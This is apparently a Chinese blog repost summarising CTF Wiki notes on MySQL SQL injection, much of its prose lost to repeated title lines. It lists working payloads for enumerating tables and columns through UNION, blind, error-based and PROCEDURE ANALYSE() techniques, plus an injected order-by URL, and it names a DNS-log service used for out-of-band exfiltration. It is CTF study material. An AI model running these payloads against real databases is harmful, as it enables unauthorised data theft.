ctf-wiki-sqli 总结

原网址 :  https://wiki.x10sec.org/web/sqli-zh/  

  ctf-wiki-sqli 总结

 

 ctf-wiki-sqli 总结

 

 ctf-wiki-sqli 总结

 

 ctf-wiki-sqli 总结

 

 ctf-wiki-sqli 总结

 

 ctf-wiki-sqli 总结

 

 ctf-wiki-sqli 总结

 

 ctf-wiki-sqli 总结

 

 

表名 ?

  • union 查询

    --MySQL 4版本时用version=9,MySQL 5版本时用version=10
    UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;   /* 列出当前数据库中的表 */
    UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database();   /* 列出所有用户自定义数据库中的表 */
    SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!=‘information_schema‘ AND table_schema!=‘mysql‘;
    
  • 盲注

    AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > ‘A‘
    
  • 报错

    AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));
    -- 在5.1.5版本中成功。

    列名 ?

    
    
    • union 查询

      UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = ‘tablename‘
      
    • 盲注

      AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > ‘A‘
      
    • 报错

      -- 在5.1.5版本中成功
      AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)
      -- MySQL 5.1版本修复了
      AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));
      
    • 利用 PROCEDURE ANALYSE()

      -- 这个需要 web 展示页面有你所注入查询的一个字段
      -- 获得第一个段名
      SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE()
      -- 获得第二个段名
      1 LIMIT 1,1 PROCEDURE ANALYSE()
      -- 获得第三个段名
      1 LIMIT 2,1 PROCEDURE ANALYSE()


      ctf-wiki-sqli 总结

       

      
      

       不让你用 “

      ctf-wiki-sqli 总结

       

      
      

       

      ctf-wiki-sqli 总结

       

      
      

       ctf-wiki-sqli 总结

       

       ctf-wiki-sqli 总结

       

       

      BENCHMARK  判断执行时间
      ctf-wiki-sqli 总结

       

      
      

       

      
      
      http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
      
      
      

       ctf-wiki-sqli 总结

       

       ctf-wiki-sqli 总结

       

       ctf-wiki-sqli 总结

       

       dnslog 平台:http://ceye.io/

       

       

ctf-wiki-sqli 总结

上一篇:js生成伪GUID


下一篇:SQL 元数据征用 PageLatch_